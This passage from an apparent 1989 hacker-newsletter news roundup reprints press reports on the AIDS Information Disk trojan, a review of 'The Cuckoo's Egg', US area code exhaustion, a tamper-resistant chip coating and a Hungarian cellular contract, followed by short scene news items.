describes it as an "Aids Information Disk," the computer experts said.  But
when it is installed in the user's computer it changes several files and hides
secret programs that later destroy data on the computer disk.

Paul Holbrook, a spokesman for the Computer Emergency Response Team, a U.S.
government-financed security organization in Pittsburgh, said his group had
confirmed the existence of the program, but did not know how widely it had
spread.

Trojan horses are programs hidden in software that secretly insert themselves
in a computer when the software masking them is activated.  They are different
from other secret programs like viruses and worms because they are not
infectious:  They do not automatically copy themselves.

A licensing agreement that accompanies the disk contains threatening
information.

It reads in part:  "In case of your breach of this license, PC Cyborg reserves
the right to take any legal action necessary to recover any outstanding debts
payable to the PC Cyborg Corporation and to use program mechanisms to ensure
termination of your use of these programs.  The mechanisms will adversely
affect other programs on your microcomputer."

When it destroys data, the program places a message on the screen that asks
users to send $387 to a Panama City address.

John McAfee, a computer security consultant in Santa Clara, California, said
the program had been mailed to people in England, West Germany, France and
Italy.
_______________________________________________________________________________

The Executive Computer:  From Espionage To Using A Printer     October 27, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Peter H. Lewis (New York Times)

Those executives who pay attention to computers are more likely to worry about
grand issues like productivity and small ones like how to make their personal
printers handle envelopes than whether the KGB has penetrated their companies.
In a fresh crop of books, they will find lessons on all these matters.

Perhaps the most entertaining of the new books is "The Cuckoo's Egg" ($19.95,
Doubleday), by Dr. Clifford Stoll, an astronomer.

Because he was the rookie in the Lawrence Berkeley Laboratories in California,
he was asked to track down and fix a glitch in the lab's accounting software,
which had found a 75-cent discrepancy when it tried to balance the books.

"First-degree robbery, huh?" was Stoll's first reaction.  But by the time he
was done nearly a year later, he had uncovered a West German spy ring that had
cracked the security of American military and research computer networks,
gathering information that it sold to Moscow.

Beyond the entertainment value of this cat-and-mouse hunt, the book has lessons
for any corporate computer user.  The message is clear:  Most companies are
irresponsible about security.

The ease with which the "hacker" penetrated even military installations was
astonishing, but not as astonishing as the lack of concern by many of the
victims.

"The Cuckoo's Egg" follows the hunt for the unknown intruder, who steals
without taking and threatens lives without touching, using only a computer
keyboard and the telephone system.

The detective is an eccentric who sleeps under his desk, prefers bicycles to
cars, and suddenly finds himself working with the Federal Bureau of
Investigation, the Central Intelligence Agency and the National Security
Agency.

Although the criminal and the hunter deal in the esoteric realm of computer
code and data encryption, Stoll makes the technology accessible.

He also discovers that navigating the global electronic grid is less difficult
than navigating the bureaucracies of various government agencies.

And while he was a whiz at tracing the cuckoo's electronic tracks from Berkeley
to Okinawa to Hannover, West Germany, Stoll reveals himself to be helplessly
lost on streets and highways and befuddled by such appliances as a microwave
oven.

Besides the more than 30 academic, military and private government
installations that were easy prey for the spies, the victims included Unisys,
TRW, SRI International, the Mitre Corporation and Bolt Beranek & Newman Inc. --
some of the very companies that design, build and test computer systems for the
government.

"No doubt about it, the shoemaker's kids are running around barefoot," Stoll
writes.

One leading character in the book is Dr. Bob Morris, chief scientist for the
National Security Agency and the inventor of the security for the Unix
operating system.

An epilogue to the book, dealing with an unrelated computer crime, recounts the
discovery that it was Morris's son who wrote the rogue program that shut down a
national network for several days last year.

In "The Macintosh Way" ($19.95, Scott, Foresman & Co.), Guy Kawasaki, a former
Apple Computer Inc. executive who is now president of a software company, has
written a candid guide about management at high-technology companies.

Although his book is intended for those who make and market computer goods, it
could prove helpful to anyone who manages a business.
_______________________________________________________________________________

Dialing Away U.S. Area Codes                                  November 13, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Laure O'Brien (Telephony Magazine)

The current endangered species in the news may not be an animal at all.  The
number of available area codes in the United States is dwindling rapidly.
Chicago consumed a new code on November 11, 1989 and and New Jersey will gobble
up another one on January 1, 1990.

There are only nine codes left, and they are expected to be used up by 1995,
said Robert McAlesse, North American Numbering Plan administrator and member of
Bellcore's technical staff.

"In 1947 (Bellcore) started with 86 codes, and they projected exhaustion in 100
to 150 years.  They were off by a few years," McAlesse said.

When the 152 available codes are exhausted, Bellcore will use a new plan for
creating area codes.

A total of 138 codes already are assigned.  Five of the remaining 14 codes are
reserved for service access codes, and 9 are for geographic area codes.

Under the current plan, a 0 or a 1 is used as the second digit while the first
and last digits can range between 2 and 9.  Under the new plan the first digit
will be between 2 and 9 and the following two digits will be numbers between 0
and 9, McAlesse said.

The new plan will create 640 potential area codes, he said.  Bellcore isn't
predicting when the newly created codes will run out.

"The growth in new services and increase in the number of telephones are
exhausting the codes.  The biggest increases are cellular telephones, pagers,
facsimile machines and new services that can have more than one number,"
McAlesse said.

The current unassigned codes include 210, 310, 410, 706, 810, 905, 909, 910 and
917.  The Chicago area took the 708 code, and New Jersey will take 908.

In the Chicago metropolitan area, the suburbs were switched from the 312 area
code to the new 708 code.  Residents and businesses within the city limits
retained the 312 code.

Illinois Bell started preparing for the change two years ago with the
announcements alerting business customers to change stationary and business
cards, said Gloria Pope, an Illinois Bell spokeswoman.  Now the telco is
targeting the residential market with billboard reminders and billing inserts.

The cost of technically preparing for the new code, including labor, is
expected to reach $15 million.  But Pope said that does not include mailings,
public relations efforts and business packages designed to smooth out the
transition.  The telco will absorb the cost with budgeted funds, and no rate
increase is expected, she said.

Modifying the network to recognize the new code started about six months ago
with translation work.  Every central office in the Chicago Metropolitan area
was adapted with a new foreign-area translator to accept the new code and route
the calls correctly, said Audrey Brooks, area manager-Chicago translations.

The long distance carriers were ready for the code's debut.  AT&T, US Sprint
and MCI changed their computer systems to recognize the new code before the
Chicago deadline.

"We are anticipating a pretty smooth transfer," said Karen Rayl, U.S. Sprint
spokeswoman.

Businesses will need to adjust their PBX software, according to AT&T technical
specialist Craig Hoopman.  "This could affect virtually every nationwide PBX,"
he said.  Modern PBX's will take about 15 minutes to adjust while older
switches could take four hours.  In many cases, customers can make the changes
themselves, he said.
_______________________________________________________________________________

A New Coating Thwarts Chip Pirates                             November 7, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John Markoff (New York Times)

Several years ago, clever high-technology pirates removed a chip from a
satellite-television descrambling device made by General Instrument
Corporation, electronically siphoned out hidden decryption software and studied
it to figure out a way to receive clear TV signals.

When the company later tried to protect the chips by coating them with epoxy,
the pirates simply developed a solvent to remove the protective seal, and stole
the software again.

Now government researchers at Lawrence Livermore National Laboratory, a weapons
and energy research center in Livermore, California, have developed a special
coating that protects the chip from attempts to pry out either the chip design
or the information it contains.  In the semiconductor industry, a competitor's
chip design can be copied through a process called reverse engineering, which
might include determining the design through an electron microscope or by
dissolving successive layers of the chip with a solvent.

Already a number of government military and intelligence agencies are using the
coating to protect circuits containing secure information.  The government has
qualified 13 U.S. chip makers to apply the coating to chips used by certain
government agencies.

The Lawrence Livermore research, known as the Connoisseur Project, has
developed a resin about the consistency of peanut butter that is injected into
the cavity surrounding the chip after it has been manufactured.  The coating is
heated and cured; The chip is then sealed with a protective lid.

The special protective resin is opaque and resists solvents, heat, grinding and
other techniques that have been developed for reverse engineering.

A second-generation coating is being developed that will automatically destroy
the chip when an attempt is made chemically to break through the protective
layer.

Another project at the laboratory is exploring even more advanced protection
methods that will insert ultra-thin screens between the layers of a chip,
making it harder to be penetrated.
______________________________________________________________________________

U.S. Firm Gets Hungarian Telephone Contract                    December 5, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken from the St. Louis Post-Dispatch (via New York Times News Service)

U.S. West Inc., one of the seven regional Bell telephone companies, announced
that it had signed an agreement with Hungary to build a mobile cellular
telephone system in Budapest.

The Hungarian cellular system will be the first such telephone network in
Eastern Europe.

Because of the shortage of telephones in their country, Hungarians are expected
to use cellular telephones for basic home service, as well as mobile
communications.

For Hungary and the other Eastern European countries that have antiquated
telephone systems, it will be faster and cheaper for the Government to deliver
telephone service by cellular networks than it would be to rebuild the nation's
entire telephone apparatus.

A cellular telephone network transmits calls on radio waves to small receiving
antennas, called "cell" sites, that relay calls to local phone systems.  The
system to be built in Hungary will transmit calls from cellular phone to
cellular phone and through the existing land-based telephone network.

The system, which is scheduled to begin operation in the first quarter of 1991,
will initially provide cellular communications to Budapest's 2.1 million
residents.  Eventually, the system will serve all of Hungary, a nation of 10.6
million.

Hungary has 6.8 telephone lines for every 100 people, according to The World's
Telephones, a statistical compilation produced by AT&T.  By comparison, the US
has 48.1 lines for every 100 people.
_____________________________________________________________________________

1.  Phone Fun (November/December) -- Some students at Columbia University in
    New York City have added a twist to that ancient annoyance, the chain
    letter.  The students have taken advantage of the school's newly installed,
    $15 million IBM/Rolm phone system's ability not only to store messages like
    an answering machine, but also to take and receive messages and send them
    -- with comments -- to a third party.

    Last spring, brothers Anil and Ajay Dubey, both seniors, recorded a parody
    of rapper Tone Loc's Top 10 single "Funky Cold Medina" and sent it to some
    buddies.  Their friends then passed the recording along with comments, to
    some other pals, who passed it on to other friends...  and so on, and so
    on, and so on.  Eventually, the message ran more than ten minutes and
    proved so popular that the phone mail system became overloaded and was
    forced to shut down.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
2.  Get a "Sprint" VISA Card Today (November 14, 1989) -- U.S. Sprint will
    begin mailing in December, a a Sprint VISA card, which will combine the
    functionality of a long distance calling card, a credit card and an ATM
    card.  Sprint will market the card which will be issued by State Street
    Bank and Trust, in Boston.

    Business travelers will receive a single bill that list all their travel
    related expenses:  Hotel, meals and phone calls.  While payment for the
    phone charges will be done through the regular Visa bill, call detail
    reports will appear on Sprint's standard FONcard bill.  Taken from
    Communications Week.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
3.  The Harpers Forum -- Harpers Magazine came up with an idea for how to
    gather information about the phreak/hack modem community.  They set up shop
    on The Well (a public access Unix and bulletin board) and invited any and
    all hackers to join in their multiple discussion subboards.

    The hackers involved were Acid Phreak, Bernie S., Cap'n Crunch, Cheshire
    Catalyst, Emmanuel Goldstein, Knight Lightning, Michael Synergy (of Reality
    Hackers Magazine), Phiber Optik, Piper, Sir Francis Drake, Taran King, and
    many old TAP subscribers.

    The Well is accessible through CompuServe's data network.  All charges for
    using The Well by hackers were absorbed by Harpers.

    There were many people on The Well posing as hackers to try and add to the
    discussion, but it turns out that some of them like Adel Aide, were shoe
    salesmen.  There were also a few security types, including Clifford Stoll
    (author of The Cuckoo's Egg), and a reporter or two like Katie Hafner (who
    writes a lot for Business Week).

    The contents of the discussion and all related materials will be used in an
    article in an upcoming issue of Harpers Magazine.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
4.  Phrozen Ghost has supposedly been arrested for crimes relating to hacking,
    telecommunications fraud, and drugs.  No other details are known at this
    time.  Information sent to PWN by Captain Crook.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
5.  SurveillanceCon '89 -- Tuc, Susan Thunder, and Prime Suspect all attended a
    Security/Surveillance Convention in Washington DC recently at which both
    Tuc and Susan Thunder gave presentations about computer security.  Tuc's
    presentation dealt largely with bulletin boards like Ripco in Chicago and
    newsletters like Phrack Inc.  Audio cassettes from all the speakers at this
    convention are available for $9.00 each, however we at PWN have no
    information about who to contact to purchase these recordings.
_______________________________________________________________________________



--------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы